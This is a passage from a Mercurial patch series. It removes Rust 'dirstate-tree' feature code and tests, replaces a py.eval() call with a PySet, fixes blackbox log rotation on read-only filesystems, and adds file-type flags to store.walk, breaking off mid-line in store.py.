assert!(tree.get_node(HgPath::new(b"we")).is_some(),); - // Inserting the same key again - assert_eq!( - tree.insert_node(HgPath::new(b"foo/bar"), entry), - Some(Node { - kind: NodeKind::File(File { - was_directory: None, - entry - }), - }) - ); - // Inserting the two levels deep - 
assert_eq!(tree.insert_node(HgPath::new(b"foo/bar/baz"), entry), None); - // Getting a file "inside a file" should return `None` - assert_eq!(tree.get_node(HgPath::new(b"foo/bar/baz/bap"),), None); - - assert_eq!( - tree.insert_node(HgPath::new(b"wasdir/subfile"), entry), - None, - ); - let removed_entry = DirstateEntry { - state: EntryState::Removed, - mode: 0, - mtime: 0, - size: 0, - }; - assert!(tree - .insert_node(HgPath::new(b"wasdir"), removed_entry) - .is_some()); - - assert_eq!( - tree.get_node(HgPath::new(b"wasdir")), - Some(&Node { - kind: NodeKind::File(File { - was_directory: Some(Box::new(Directory { - was_file: None, - children: [( - b"subfile".to_vec(), - Node { - kind: NodeKind::File(File { - was_directory: None, - entry, - }) - } - )] - .to_vec() - .into_iter() - .collect() - })), - entry: removed_entry - }) - }) - ); - - assert!(tree.get(HgPath::new(b"wasdir/subfile")).is_some()) - } - - #[test] - fn test_insert_removed() { - let mut tree = Tree::new(); - let entry = DirstateEntry { - state: EntryState::Merged, - mode: 1, - mtime: 2, - size: 3, - }; - let removed_entry = DirstateEntry { - state: EntryState::Removed, - mode: 10, - mtime: 20, - size: 30, - }; - assert_eq!(tree.insert_node(HgPath::new(b"foo"), entry), None); - assert_eq!( - tree.insert_node(HgPath::new(b"foo/a"), removed_entry), - None - ); - // The insert should not turn `foo` into a directory as `foo` is not - // `Removed`. - match tree.get_node(HgPath::new(b"foo")).unwrap().kind { - NodeKind::Directory(_) => panic!("should be a file"), - NodeKind::File(_) => {} - } - - let mut tree = Tree::new(); - let entry = DirstateEntry { - state: EntryState::Merged, - mode: 1, - mtime: 2, - size: 3, - }; - let removed_entry = DirstateEntry { - state: EntryState::Removed, - mode: 10, - mtime: 20, - size: 30, - }; - // The insert *should* turn `foo` into a directory as it is `Removed`. 
- assert_eq!(tree.insert_node(HgPath::new(b"foo"), removed_entry), None); - assert_eq!(tree.insert_node(HgPath::new(b"foo/a"), entry), None); - match tree.get_node(HgPath::new(b"foo")).unwrap().kind { - NodeKind::Directory(_) => {} - NodeKind::File(_) => panic!("should be a directory"), - } - } - - #[test] - fn test_get() { - let mut tree = Tree::new(); - let entry = DirstateEntry { - state: EntryState::Merged, - mode: 1, - mtime: 2, - size: 3, - }; - assert_eq!(tree.insert_node(HgPath::new(b"a/b/c"), entry), None); - assert_eq!(tree.files_count, 1); - assert_eq!(tree.get(HgPath::new(b"a/b/c")), Some(&entry)); - assert_eq!(tree.get(HgPath::new(b"a/b")), None); - assert_eq!(tree.get(HgPath::new(b"a")), None); - assert_eq!(tree.get(HgPath::new(b"a/b/c/d")), None); - let entry2 = DirstateEntry { - state: EntryState::Removed, - mode: 0, - mtime: 5, - size: 1, - }; - // was_directory - assert_eq!(tree.insert(HgPath::new(b"a/b"), entry2), None); - assert_eq!(tree.files_count, 2); - assert_eq!(tree.get(HgPath::new(b"a/b")), Some(&entry2)); - assert_eq!(tree.get(HgPath::new(b"a/b/c")), Some(&entry)); - - let mut tree = Tree::new(); - - // was_file - assert_eq!(tree.insert_node(HgPath::new(b"a"), entry), None); - assert_eq!(tree.files_count, 1); - assert_eq!(tree.insert_node(HgPath::new(b"a/b"), entry2), None); - assert_eq!(tree.files_count, 2); - assert_eq!(tree.get(HgPath::new(b"a/b")), Some(&entry2)); - } - - #[test] - fn test_get_mut() { - let mut tree = Tree::new(); - let mut entry = DirstateEntry { - state: EntryState::Merged, - mode: 1, - mtime: 2, - size: 3, - }; - assert_eq!(tree.insert_node(HgPath::new(b"a/b/c"), entry), None); - assert_eq!(tree.files_count, 1); - assert_eq!(tree.get_mut(HgPath::new(b"a/b/c")), Some(&mut entry)); - assert_eq!(tree.get_mut(HgPath::new(b"a/b")), None); - assert_eq!(tree.get_mut(HgPath::new(b"a")), None); - assert_eq!(tree.get_mut(HgPath::new(b"a/b/c/d")), None); - let mut entry2 = DirstateEntry { - state: EntryState::Removed, - 
mode: 0, - mtime: 5, - size: 1, - }; - // was_directory - assert_eq!(tree.insert(HgPath::new(b"a/b"), entry2), None); - assert_eq!(tree.files_count, 2); - assert_eq!(tree.get_mut(HgPath::new(b"a/b")), Some(&mut entry2)); - assert_eq!(tree.get_mut(HgPath::new(b"a/b/c")), Some(&mut entry)); - - let mut tree = Tree::new(); - - // was_file - assert_eq!(tree.insert_node(HgPath::new(b"a"), entry), None); - assert_eq!(tree.files_count, 1); - assert_eq!(tree.insert_node(HgPath::new(b"a/b"), entry2), None); - assert_eq!(tree.files_count, 2); - assert_eq!(tree.get_mut(HgPath::new(b"a/b")), Some(&mut entry2)); - } - - #[test] - fn test_remove() { - let mut tree = Tree::new(); - assert_eq!(tree.files_count, 0); - assert_eq!(tree.remove(HgPath::new(b"foo")), None); - assert_eq!(tree.files_count, 0); - - let entry = DirstateEntry { - state: EntryState::Normal, - mode: 0, - mtime: 0, - size: 0, - }; - assert_eq!(tree.insert_node(HgPath::new(b"a/b/c"), entry), None); - assert_eq!(tree.files_count, 1); - - assert_eq!(tree.remove(HgPath::new(b"a/b/c")), Some(entry)); - assert_eq!(tree.files_count, 0); - - assert_eq!(tree.insert_node(HgPath::new(b"a/b/x"), entry), None); - assert_eq!(tree.insert_node(HgPath::new(b"a/b/y"), entry), None); - assert_eq!(tree.insert_node(HgPath::new(b"a/b/z"), entry), None); - assert_eq!(tree.insert_node(HgPath::new(b"x"), entry), None); - assert_eq!(tree.insert_node(HgPath::new(b"y"), entry), None); - assert_eq!(tree.files_count, 5); - - assert_eq!(tree.remove(HgPath::new(b"a/b/x")), Some(entry)); - assert_eq!(tree.files_count, 4); - assert_eq!(tree.remove(HgPath::new(b"a/b/x")), None); - assert_eq!(tree.files_count, 4); - assert_eq!(tree.remove(HgPath::new(b"a/b/y")), Some(entry)); - assert_eq!(tree.files_count, 3); - assert_eq!(tree.remove(HgPath::new(b"a/b/z")), Some(entry)); - assert_eq!(tree.files_count, 2); - - assert_eq!(tree.remove(HgPath::new(b"x")), Some(entry)); - assert_eq!(tree.files_count, 1); - assert_eq!(tree.remove(HgPath::new(b"y")), 
Some(entry)); - assert_eq!(tree.files_count, 0); - - // `a` should have been cleaned up, no more files anywhere in its - // descendents - assert_eq!(tree.get_node(HgPath::new(b"a")), None); - assert_eq!(tree.root.children().unwrap().len(), 0); - - let removed_entry = DirstateEntry { - state: EntryState::Removed, - ..entry - }; - assert_eq!(tree.insert(HgPath::new(b"a"), removed_entry), None); - assert_eq!(tree.insert_node(HgPath::new(b"a/b/x"), entry), None); - assert_eq!(tree.files_count, 2); - dbg!(&tree); - assert_eq!(tree.remove(HgPath::new(b"a")), Some(removed_entry)); - assert_eq!(tree.files_count, 1); - dbg!(&tree); - assert_eq!(tree.remove(HgPath::new(b"a/b/x")), Some(entry)); - assert_eq!(tree.files_count, 0); - - // The entire tree should have been cleaned up, no more files anywhere - // in its descendents - assert_eq!(tree.root.children().unwrap().len(), 0); - - let removed_entry = DirstateEntry { - state: EntryState::Removed, - ..entry - }; - assert_eq!(tree.insert(HgPath::new(b"a"), entry), None); - assert_eq!( - tree.insert_node(HgPath::new(b"a/b/x"), removed_entry), - None - ); - assert_eq!(tree.files_count, 2); - dbg!(&tree); - assert_eq!(tree.remove(HgPath::new(b"a")), Some(entry)); - assert_eq!(tree.files_count, 1); - dbg!(&tree); - assert_eq!(tree.remove(HgPath::new(b"a/b/x")), Some(removed_entry)); - assert_eq!(tree.files_count, 0); - - dbg!(&tree); - // The entire tree should have been cleaned up, no more files anywhere - // in its descendents - assert_eq!(tree.root.children().unwrap().len(), 0); - - assert_eq!(tree.insert(HgPath::new(b"d"), entry), None); - assert_eq!(tree.insert(HgPath::new(b"d/d/d"), entry), None); - assert_eq!(tree.files_count, 2); - - // Deleting the nested file should not delete the top directory as it - // used to be a file - assert_eq!(tree.remove(HgPath::new(b"d/d/d")), Some(entry)); - assert_eq!(tree.files_count, 1); - assert!(tree.get_node(HgPath::new(b"d")).is_some()); - 
assert!(tree.remove(HgPath::new(b"d")).is_some()); - assert_eq!(tree.files_count, 0); - - // Deleting the nested file should not delete the top file (other way - // around from the last case) - assert_eq!(tree.insert(HgPath::new(b"a/a"), entry), None); - assert_eq!(tree.files_count, 1); - assert_eq!(tree.insert(HgPath::new(b"a"), entry), None); - assert_eq!(tree.files_count, 2); - dbg!(&tree); - assert_eq!(tree.remove(HgPath::new(b"a/a")), Some(entry)); - assert_eq!(tree.files_count, 1); - dbg!(&tree); - assert!(tree.get_node(HgPath::new(b"a")).is_some()); - assert!(tree.get_node(HgPath::new(b"a/a")).is_none()); - } - - #[test] - fn test_was_directory() { - let mut tree = Tree::new(); - - let entry = DirstateEntry { - state: EntryState::Removed, - mode: 0, - mtime: 0, - size: 0, - }; - assert_eq!(tree.insert_node(HgPath::new(b"a/b/c"), entry), None); - assert_eq!(tree.files_count, 1); - - assert!(tree.insert_node(HgPath::new(b"a"), entry).is_some()); - let new_a = tree.root.children().unwrap().get(&b"a".to_vec()).unwrap(); - - match &new_a.kind { - NodeKind::Directory(_) => panic!(), - NodeKind::File(f) => { - let dir = f.was_directory.clone().unwrap(); - let c = dir - .children - .get(&b"b".to_vec()) - .unwrap() - .children() - .unwrap() - .get(&b"c".to_vec()) - .unwrap(); - - assert_eq!( - match &c.kind { - NodeKind::Directory(_) => panic!(), - NodeKind::File(f) => f.entry, - }, - entry - ); - } - } - assert_eq!(tree.files_count, 2); - dbg!(&tree); - assert_eq!(tree.remove(HgPath::new(b"a/b/c")), Some(entry)); - assert_eq!(tree.files_count, 1); - dbg!(&tree); - let a = tree.get_node(HgPath::new(b"a")).unwrap(); - match &a.kind { - NodeKind::Directory(_) => panic!(), - NodeKind::File(f) => { - // Directory in `was_directory` was emptied, should be removed - assert_eq!(f.was_directory, None); - } - } - } - #[test] - fn test_extend() { - let insertions = [ - ( - HgPathBuf::from_bytes(b"d"), - DirstateEntry { - state: EntryState::Added, - mode: 0, - mtime: -1, - 
size: -1, - }, - ), - ( - HgPathBuf::from_bytes(b"b"), - DirstateEntry { - state: EntryState::Normal, - mode: 33188, - mtime: 1599647984, - size: 2, - }, - ), - ( - HgPathBuf::from_bytes(b"a/a"), - DirstateEntry { - state: EntryState::Normal, - mode: 33188, - mtime: 1599647984, - size: 2, - }, - ), - ( - HgPathBuf::from_bytes(b"d/d/d"), - DirstateEntry { - state: EntryState::Removed, - mode: 0, - mtime: 0, - size: 0, - }, - ), - ] - .to_vec(); - let mut tree = Tree::new(); - - tree.extend(insertions.clone().into_iter()); - - for (path, _) in &insertions { - assert!(tree.contains_key(path), true); - } - assert_eq!(tree.files_count, 4); - } -} diff --git a/rust/hg-core/src/dirstate/parsers.rs b/rust/hg-core/src/dirstate/parsers.rs --- a/rust/hg-core/src/dirstate/parsers.rs +++ b/rust/hg-core/src/dirstate/parsers.rs @@ -73,7 +73,6 @@ } /// `now` is the duration in seconds since the Unix epoch -#[cfg(not(feature = "dirstate-tree"))] pub fn pack_dirstate( state_map: &mut StateMap, copy_map: &CopyMap, @@ -146,79 +145,6 @@ Ok(packed) } -/// `now` is the duration in seconds since the Unix epoch -#[cfg(feature = "dirstate-tree")] -pub fn pack_dirstate( - state_map: &mut StateMap, - copy_map: &CopyMap, - parents: DirstateParents, - now: Duration, -) -> Result<Vec<u8>, DirstatePackError> { - // TODO move away from i32 before 2038. 
- let now: i32 = now.as_secs().try_into().expect("time overflow"); - - let expected_size: usize = state_map - .iter() - .map(|(filename, _)| { - let mut length = MIN_ENTRY_SIZE + filename.len(); - if let Some(copy) = copy_map.get(&filename) { - length += copy.len() + 1; - } - length - }) - .sum(); - let expected_size = expected_size + PARENT_SIZE * 2; - - let mut packed = Vec::with_capacity(expected_size); - let mut new_state_map = vec![]; - - packed.extend(&parents.p1); - packed.extend(&parents.p2); - - for (filename, entry) in state_map.iter() { - let new_filename = filename.to_owned(); - let mut new_mtime: i32 = entry.mtime; - if entry.state == EntryState::Normal && entry.mtime == now { - // The file was last modified "simultaneously" with the current - // write to dirstate (i.e. within the same second for file- - // systems with a granularity of 1 sec). This commonly happens - // for at least a couple of files on 'update'. - // The user could change the file without changing its size - // within the same second. Invalidate the file's mtime in - // dirstate, forcing future 'status' calls to compare the - // contents of the file if the size is the same. This prevents - // mistakenly treating such files as clean. 
- new_mtime = -1; - new_state_map.push(( - filename.to_owned(), - DirstateEntry { - mtime: new_mtime, - ..entry - }, - )); - } - let mut new_filename = new_filename.into_vec(); - if let Some(copy) = copy_map.get(&filename) { - new_filename.push(b'\0'); - new_filename.extend(copy.bytes()); - } - - packed.write_u8(entry.state.into())?; - packed.write_i32::<BigEndian>(entry.mode)?; - packed.write_i32::<BigEndian>(entry.size)?; - packed.write_i32::<BigEndian>(new_mtime)?; - packed.write_i32::<BigEndian>(new_filename.len() as i32)?; - packed.extend(new_filename) - } - - if packed.len() != expected_size { - return Err(DirstatePackError::BadSize(expected_size, packed.len())); - } - - state_map.extend(new_state_map); - - Ok(packed) -} #[cfg(test)] mod tests { diff --git a/rust/hg-core/src/dirstate/status.rs b/rust/hg-core/src/dirstate/status.rs --- a/rust/hg-core/src/dirstate/status.rs +++ b/rust/hg-core/src/dirstate/status.rs @@ -9,9 +9,6 @@ //! It is currently missing a lot of functionality compared to the Python one //! and will only be triggered in narrow cases. 
-#[cfg(feature = "dirstate-tree")] -use crate::dirstate::dirstate_tree::iter::StatusShortcut; -#[cfg(not(feature = "dirstate-tree"))] use crate::utils::path_auditor::PathAuditor; use crate::{ dirstate::SIZE_FROM_OTHER_PARENT, @@ -703,83 +700,6 @@ /// /// This takes a mutable reference to the results to account for the /// `extend` in timings - #[cfg(feature = "dirstate-tree")] - #[timed] - pub fn extend_from_dmap(&self, results: &mut Vec<DispatchedPath<'a>>) { - results.par_extend( - self.dmap - .fs_iter(self.root_dir.clone()) - .par_bridge() - .filter(|(path, _)| self.matcher.matches(path)) - .map(move |(filename, shortcut)| { - let entry = match shortcut { - StatusShortcut::Entry(e) => e, - StatusShortcut::Dispatch(d) => { - return (Cow::Owned(filename), d) - } - }; - let filename_as_path = match hg_path_to_path_buf(&filename) - { - Ok(f) => f, - Err(_) => { - return ( - Cow::Owned(filename), - INVALID_PATH_DISPATCH, - ) - } - }; - let meta = self - .root_dir - .join(filename_as_path) - .symlink_metadata(); - - match meta { - Ok(m) - if !(m.file_type().is_file() - || m.file_type().is_symlink()) => - { - ( - Cow::Owned(filename), - dispatch_missing(entry.state), - ) - } - Ok(m) => { - let dispatch = dispatch_found( - &filename, - entry, - HgMetadata::from_metadata(m), - &self.dmap.copy_map, - self.options, - ); - (Cow::Owned(filename), dispatch) - } - Err(e) - if e.kind() == ErrorKind::NotFound - || e.raw_os_error() == Some(20) => - { - // Rust does not yet have an `ErrorKind` for - // `NotADirectory` (errno 20) - // It happens if the dirstate contains `foo/bar` - // and foo is not a - // directory - ( - Cow::Owned(filename), - dispatch_missing(entry.state), - ) - } - Err(e) => { - (Cow::Owned(filename), dispatch_os_error(&e)) - } - } - }), - ); - } - - /// Add the files in the dirstate to the results. 
- /// - /// This takes a mutable reference to the results to account for the - /// `extend` in timings - #[cfg(not(feature = "dirstate-tree"))] #[timed] pub fn extend_from_dmap(&self, results: &mut Vec<DispatchedPath<'a>>) { results.par_extend( @@ -850,7 +770,6 @@ /// /// This takes a mutable reference to the results to account for the /// `extend` in timings - #[cfg(not(feature = "dirstate-tree"))] #[timed] pub fn handle_unknowns(&self, results: &mut Vec<DispatchedPath<'a>>) { let to_visit: Vec<(&HgPath, &DirstateEntry)> = diff --git a/rust/hg-core/src/operations/dirstate_status.rs b/rust/hg-core/src/operations/dirstate_status.rs --- a/rust/hg-core/src/operations/dirstate_status.rs +++ b/rust/hg-core/src/operations/dirstate_status.rs @@ -14,66 +14,6 @@ /// files. pub type LookupAndStatus<'a> = (Vec<HgPathCow<'a>>, DirstateStatus<'a>); -#[cfg(feature = "dirstate-tree")] -impl<'a, M: Matcher + Sync> Status<'a, M> { - pub(crate) fn run(&self) -> Result<LookupAndStatus<'a>, StatusError> { - let (traversed_sender, traversed_receiver) = - crossbeam_channel::unbounded(); - - // Step 1: check the files explicitly mentioned by the user - let (work, mut results) = self.walk_explicit(traversed_sender.clone()); - - // Step 2: Check files in the dirstate - if !self.matcher.is_exact() { - self.extend_from_dmap(&mut results); - } - // Step 3: Check the working directory if listing unknowns - if !work.is_empty() { - // Hashmaps are quite a bit slower to build than vecs, so only - // build it if needed. 
- let mut old_results = None; - - // Step 2: recursively check the working directory for changes if - // needed - for (dir, dispatch) in work { - match dispatch { - Dispatch::Directory { was_file } => { - if was_file { - results.push((dir.to_owned(), Dispatch::Removed)); - } - if self.options.list_ignored - || self.options.list_unknown - && !self.dir_ignore(&dir) - { - if old_results.is_none() { - old_results = - Some(results.iter().cloned().collect()); - } - self.traverse( - &dir, - old_results - .as_ref() - .expect("old results should exist"), - &mut results, - traversed_sender.clone(), - ); - } - } - _ => { - unreachable!("There can only be directories in `work`") - } - } - } - } - - drop(traversed_sender); - let traversed = traversed_receiver.into_iter().collect(); - - Ok(build_response(results, traversed)) - } -} - -#[cfg(not(feature = "dirstate-tree"))] impl<'a, M: Matcher + Sync> Status<'a, M> { pub(crate) fn run(&self) -> Result<LookupAndStatus<'a>, StatusError> { let (traversed_sender, traversed_receiver) = diff --git a/rust/hg-cpython/Cargo.toml b/rust/hg-cpython/Cargo.toml --- a/rust/hg-cpython/Cargo.toml +++ b/rust/hg-cpython/Cargo.toml @@ -10,7 +10,6 @@ [features] default = ["python27"] -dirstate-tree = ["hg-core/dirstate-tree"] # Features to build an extension module: python27 = ["cpython/python27-sys", "cpython/extension-module-2-7"] diff --git a/rust/hg-cpython/src/dirstate/dirstate_map.rs b/rust/hg-cpython/src/dirstate/dirstate_map.rs --- a/rust/hg-cpython/src/dirstate/dirstate_map.rs +++ b/rust/hg-cpython/src/dirstate/dirstate_map.rs @@ -547,14 +547,12 @@ ) -> Ref<'a, RustDirstateMap> { self.inner(py).borrow() } - #[cfg(not(feature = "dirstate-tree"))] fn translate_key( py: Python, res: (&HgPathBuf, &DirstateEntry), ) -> PyResult<Option<PyBytes>> { Ok(Some(PyBytes::new(py, res.0.as_bytes()))) } - #[cfg(not(feature = "dirstate-tree"))] fn translate_key_value( py: Python, res: (&HgPathBuf, &DirstateEntry), @@ -565,24 +563,6 @@ 
make_dirstate_tuple(py, &entry)?, ))) } - #[cfg(feature = "dirstate-tree")] - fn translate_key( - py: Python, - res: (HgPathBuf, DirstateEntry), - ) -> PyResult<Option<PyBytes>> { - Ok(Some(PyBytes::new(py, res.0.as_bytes()))) - } - #[cfg(feature = "dirstate-tree")] - fn translate_key_value( - py: Python, - res: (HgPathBuf, DirstateEntry), - ) -> PyResult<Option<(PyBytes, PyObject)>> { - let (f, entry) = res; - Ok(Some(( - PyBytes::new(py, f.as_bytes()), - make_dirstate_tuple(py, &entry)?, - ))) - } } py_shared_iterator!( # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1617885507 -7200 # Thu Apr 08 14:38:27 2021 +0200 # Node ID c6ceb5f27f97ea3cb4d1e01fa811dbd1be3238f1 # Parent 441024b279a635f3bf9bd0e857c8e346abb48d98 rust: Remove use of `py.eval()` The previous Rust code allocated an intermediate `Vec`, converted that to a Python list, then used `eval` to run Python code that converts that list to a Python set. rust-cpython exposes Rust bindings for Python sets, let’s use that instead to construct a set directly. 
Differential Revision: https://phab.mercurial-scm.org/D10328 diff --git a/rust/hg-cpython/src/dirstate/dirstate_map.rs b/rust/hg-cpython/src/dirstate/dirstate_map.rs --- a/rust/hg-cpython/src/dirstate/dirstate_map.rs +++ b/rust/hg-cpython/src/dirstate/dirstate_map.rs @@ -14,8 +14,8 @@ use cpython::{ exc, ObjectProtocol, PyBool, PyBytes, PyClone, PyDict, PyErr, PyList, - PyObject, PyResult, PyString, PyTuple, Python, PythonObject, ToPyObject, - UnsafePyLeaked, + PyObject, PyResult, PySet, PyString, PyTuple, Python, PythonObject, + ToPyObject, UnsafePyLeaked, }; use crate::{ @@ -175,18 +175,11 @@ let (_, other_parent) = inner_shared.get_non_normal_other_parent_entries(); - let locals = PyDict::new(py); - locals.set_item( - py, - "other_parent", - other_parent - .iter() - .map(|v| PyBytes::new(py, v.as_bytes())) - .collect::<Vec<PyBytes>>() - .to_py_object(py), - )?; - - py.eval("set(other_parent)", None, Some(&locals)) + let set = PySet::empty(py)?; + for path in other_parent.iter() { + set.add(py, PyBytes::new(py, path.as_bytes()))?; + } + Ok(set.into_object()) } def non_normal_entries(&self) -> PyResult<NonNormalEntries> { # HG changeset patch # User Valentin Gatien-Baron <vgatien-baron@janestreet.com> # Date 1617227642 14400 # Wed Mar 31 17:54:02 2021 -0400 # Node ID 4a6024b87dfcc1c325fcb068a7102ae3751832a2 # Parent c6ceb5f27f97ea3cb4d1e01fa811dbd1be3238f1 blackbox: fix type error on log rotation on read-only filesystem Grepping around, the code uses either encoding.strtolocal or stringutil.forcebytestr in this situation. No idea which is best. Differential Revision: https://phab.mercurial-scm.org/D10293 diff --git a/mercurial/loggingutil.py b/mercurial/loggingutil.py --- a/mercurial/loggingutil.py +++ b/mercurial/loggingutil.py @@ -10,7 +10,10 @@ import errno -from . import pycompat +from . 
import ( + encoding, + pycompat, +) from .utils import ( dateutil, @@ -32,7 +35,7 @@ if err.errno != errno.ENOENT: ui.debug( b"warning: cannot remove '%s': %s\n" - % (newpath, err.strerror) + % (newpath, encoding.strtolocal(err.strerror)) ) try: if newpath: @@ -41,7 +44,7 @@ if err.errno != errno.ENOENT: ui.debug( b"warning: cannot rename '%s' to '%s': %s\n" - % (newpath, oldpath, err.strerror) + % (newpath, oldpath, encoding.strtolocal(err.strerror)) ) if maxsize > 0: diff --git a/tests/test-blackbox.t b/tests/test-blackbox.t --- a/tests/test-blackbox.t +++ b/tests/test-blackbox.t @@ -317,6 +317,17 @@ 1970/01/01 00:00:00 bob @45589e459b2edfbf3dbde7e01f611d2c1e7453d7 (5000)> --debug log -r tip exited 0 after *.?? seconds (glob) 1970/01/01 00:00:00 bob @45589e459b2edfbf3dbde7e01f611d2c1e7453d7 (5000)> blackbox +Skip rotation if the .hg is read-only + +#if unix-permissions + $ chmod -w .hg + $ hg log -r. -T '{rev}\n' --config blackbox.maxsize=1 --debug + warning: cannot rename '$TESTTMP/blackboxtest3/.hg/blackbox.log.1' to '$TESTTMP/blackboxtest3/.hg/blackbox.log': Permission denied + warning: cannot write to blackbox.log: Permission denied + 1 + $ chmod +w .hg +#endif + Test log recursion from dirty status check $ cat > ../r.py <<EOF # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1617642171 14400 # Mon Apr 05 13:02:51 2021 -0400 # Node ID 3d32b97590476c2e7657b058788e61169a4059ca # Parent 4a6024b87dfcc1c325fcb068a7102ae3751832a2 contrib: restore the `hg fix` configuration in the examples After decc3bd3f20d, running `black` will DTRT, but running `hg fix` did nothing (unless the example config file was %included, in which case it truncated the file instead of formatting it). I'm not sure why that was happening, but let's not leave a code shredder laying around. 
Differential Revision: https://phab.mercurial-scm.org/D10311 diff --git a/contrib/examples/fix.hgrc b/contrib/examples/fix.hgrc --- a/contrib/examples/fix.hgrc +++ b/contrib/examples/fix.hgrc @@ -5,7 +5,7 @@ rustfmt:command = rustfmt +nightly rustfmt:pattern = set:"**.rs" - "mercurial/thirdparty/**" -black:command = black +black:command = black --config=pyproject.toml - black:pattern = set:**.py - mercurial/thirdparty/** # Mercurial doesn't have any Go code, but if we did this is how we # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1617681294 14400 # Mon Apr 05 23:54:54 2021 -0400 # Node ID fe34c75f62ab302757ae18973ce7736d5f1c00eb # Parent 3d32b97590476c2e7657b058788e61169a4059ca tests: skip test-git-interop.t on Windows Casefolding isn't handled in dirstate yet, triggering a bunch of assertions. But while this is more correctly `no-icasefs`, it's more likely to get attention if someone sees it. I'd just rather not have it adding to the noise on Windows for now. Differential Revision: https://phab.mercurial-scm.org/D10312 diff --git a/tests/test-git-interop.t b/tests/test-git-interop.t --- a/tests/test-git-interop.t +++ b/tests/test-git-interop.t @@ -1,4 +1,4 @@ -#require pygit2 +#require pygit2 no-windows Setup: $ GIT_AUTHOR_NAME='test'; export GIT_AUTHOR_NAME # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617698283 -7200 # Tue Apr 06 10:38:03 2021 +0200 # Node ID 6085b7f1536dbb3e9375907235e6a7a56af6004f # Parent fe34c75f62ab302757ae18973ce7736d5f1c00eb store: also return some information about the type of file `walk` found We start returning of 4th information in the `store.walk` return tuple: the type of the file. This will make it easier for caller to determine which kind of file they are looking at. This should especically help with the `upgrade-repo` code that has to do a lot of fragile index's file name comparison. 
Differential Revision: https://phab.mercurial-scm.org/D10315 diff --git a/hgext/largefiles/lfutil.py b/hgext/largefiles/lfutil.py --- a/hgext/largefiles/lfutil.py +++ b/hgext/largefiles/lfutil.py @@ -514,7 +514,7 @@ def islfilesrepo(repo): '''Return true if the repo is a largefile repo.''' if b'largefiles' in repo.requirements and any( - shortnameslash in f[0] for f in repo.store.datafiles() + shortnameslash in f[1] for f in repo.store.datafiles() ): return True diff --git a/hgext/largefiles/reposetup.py b/hgext/largefiles/reposetup.py --- a/hgext/largefiles/reposetup.py +++ b/hgext/largefiles/reposetup.py @@ -445,7 +445,7 @@ def checkrequireslfiles(ui, repo, **kwargs): if b'largefiles' not in repo.requirements and any( - lfutil.shortname + b'/' in f[0] for f in repo.store.datafiles() + lfutil.shortname + b'/' in f[1] for f in repo.store.datafiles() ): repo.requirements.add(b'largefiles') scmutil.writereporequirements(repo) diff --git a/hgext/narrow/narrowcommands.py b/hgext/narrow/narrowcommands.py --- a/hgext/narrow/narrowcommands.py +++ b/hgext/narrow/narrowcommands.py @@ -276,7 +276,7 @@ repair.strip(ui, unfi, tostrip, topic=b'narrow', backup=backup) todelete = [] - for f, f2, size in repo.store.datafiles(): + for t, f, f2, size in repo.store.datafiles(): if f.startswith(b'data/'): file = f[5:-2] if not newmatch(file): diff --git a/hgext/remotefilelog/contentstore.py b/hgext/remotefilelog/contentstore.py --- a/hgext/remotefilelog/contentstore.py +++ b/hgext/remotefilelog/contentstore.py @@ -365,7 +365,7 @@ ledger.markdataentry(self, treename, node) ledger.markhistoryentry(self, treename, node) - for path, encoded, size in self._store.datafiles(): + for t, path, encoded, size in self._store.datafiles(): if path[:5] != b'meta/' or path[-2:] != b'.i': continue diff --git a/hgext/remotefilelog/remotefilelogserver.py b/hgext/remotefilelog/remotefilelogserver.py --- a/hgext/remotefilelog/remotefilelogserver.py +++ b/hgext/remotefilelog/remotefilelogserver.py @@ 
-164,24 +164,26 @@ b'.d' ): n = util.pconvert(fp[striplen:]) - yield (store.decodedir(n), n, st.st_size) + d = store.decodedir(n) + t = store.FILETYPE_OTHER + yield (t, d, n, st.st_size) if kind == stat.S_IFDIR: visit.append(fp) if scmutil.istreemanifest(repo): - for (u, e, s) in repo.store.datafiles(): + for (t, u, e, s) in repo.store.datafiles(): if u.startswith(b'meta/') and ( u.endswith(b'.i') or u.endswith(b'.d') ): - yield (u, e, s) + yield (t, u, e, s) # Return .d and .i files that do not match the shallow pattern match = state.match if match and not match.always(): - for (u, e, s) in repo.store.datafiles(): + for (t, u, e, s) in repo.store.datafiles(): f = u[5:-2] # trim data/... and .i/.d if not state.match(f): - yield (u, e, s) + yield (t, u, e, s) for x in repo.store.topfiles(): if state.noflatmf and x[0][:11] == b'00manifest.': diff --git a/mercurial/repair.py b/mercurial/repair.py --- a/mercurial/repair.py +++ b/mercurial/repair.py @@ -428,7 +428,7 @@ if scmutil.istreemanifest(repo): # This logic is safe if treemanifest isn't enabled, but also # pointless, so we skip it if treemanifest isn't enabled. 
- for unencoded, encoded, size in repo.store.datafiles(): + for t, unencoded, encoded, size in repo.store.datafiles(): if unencoded.startswith(b'meta/') and unencoded.endswith( b'00manifest.i' ): diff --git a/mercurial/store.py b/mercurial/store.py --- a/mercurial/store.py +++ b/mercurial/store.py @@ -387,13 +387,44 @@ b'requires', ] -REVLOG_FILES_EXT = (b'.i', b'.d', b'.n', b'.nd') +REVLOG_FILES_MAIN_EXT = (b'.i', b'i.tmpcensored') +REVLOG_FILES_OTHER_EXT = (b'.d', b'.n', b'.nd', b'd.tmpcensored') + + +def is_revlog(f, kind, st): + if kind != stat.S_IFREG: + return None + return revlog_type(f) + + +def revlog_type(f): + if f.endswith(REVLOG_FILES_MAIN_EXT): + return FILEFLAGS_REVLOG_MAIN + elif f.endswith(REVLOG_FILES_OTHER_EXT): + return FILETYPE_FILELOG_OTHER -def isrevlog(f, kind, st): - if kind != stat.S_IFREG: - return False - return f.endswith(REVLOG_FILES_EXT) +# the file is part of changelog data +FILEFLAGS_CHANGELOG = 1 << 13 +# the file is part of manifest data +FILEFLAGS_MANIFESTLOG = 1 << 12 +# the file is part of filelog data +FILEFLAGS_FILELOG = 1 << 11 +# file that are not directly part of a revlog +FILEFLAGS_OTHER = 1 << 10 + +# the main entry point for a revlog +FILEFLAGS_REVLOG_MAIN = 1 << 1 +# a secondary file for a revlog +FILEFLAGS_REVLOG_OTHER = 1 << 0 + +FILETYPE_CHANGELOG_MAIN = FILEFLAGS_CHANGELOG | FILEFLAGS_REVLOG_MAIN +FILETYPE_CHANGELOG_OTHER = FILEFLAGS_CHANGELOG | FILEFLAGS_REVLOG_OTHER +FILETYPE_MANIFESTLOG_MAIN = FILEFLAGS_MANIFESTLOG | 